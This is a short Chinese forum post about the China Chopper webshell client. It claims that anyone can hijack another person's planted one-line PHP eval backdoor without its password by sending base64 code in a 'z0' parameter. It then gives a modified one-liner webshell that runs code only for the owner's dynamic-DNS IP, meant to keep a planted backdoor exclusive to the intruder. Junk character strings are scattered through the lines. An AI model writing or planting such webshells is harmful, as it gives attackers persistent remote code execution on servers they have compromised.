今天试了下“中国菜刀”这款C/S的WEB管理软件,发现一个致命的漏洞! j) M1 S6 c' C. X) r" T/ a
" }/ c- i1 n6 \# C5 W( V+ R! D
就算你设置了密码,使用了eval($_REQUEST['moyo']);
8 p1 i9 N, B9 o
) v7 }2 ~6 }9 M/ S! w% U; W但是别人还是可以在不知道连接密码是moyo的情况下直接使用你的一句话后门
3 o9 P l4 V" ]: ]. ?! H% e8 N3 G" B
因为$_REQUEST['moyo']传递的内容是@eval(base64_decode($_POST[z0]));
0 ~, w# m- R, f( R3 V3 R- P5 `; n7 s5 d
直接访问 /backdoor.php?z0={BASE64加密后的代码} 就可以执行代码了
- Q5 ?' F% T% N- c
& e; [& w7 ?, O* p不知道是设计缺陷还是故意留的后门
; w( Z* H8 R7 k" X6 j* L
8 V# r& R0 ^. ]8 ]: l1 w如果有人使用一句话之类的密码,有个小技巧可以避免自己的一句话被人盗用3 |; S5 u+ l5 t
: v& E% D! t" A- t+ h6 f本地使用花生壳之类的DDNS软件,比如分配域名是moyo.apiz.org3 ^! b' V c* b) B; J+ b
# R' ~( ]1 Z& x; b6 o( x
然后一句话后门这样写
# q) O7 o- J' q& @8 b
) b7 s. q/ Z: N<?php $_SERVER['REMOTE_ADDR'] == gethostbyname('moyo.apiz.org') ? @eval($_REQUEST['moyo']) : exit('DENIED') ?>+ ?" s, b! p3 w
这样就可以让一句话后门只允许自己的电脑连接了, T" e9 ?; O' L; p; p2 r2 _
1 j) T- G; F3 q6 v9 Q! R2 K |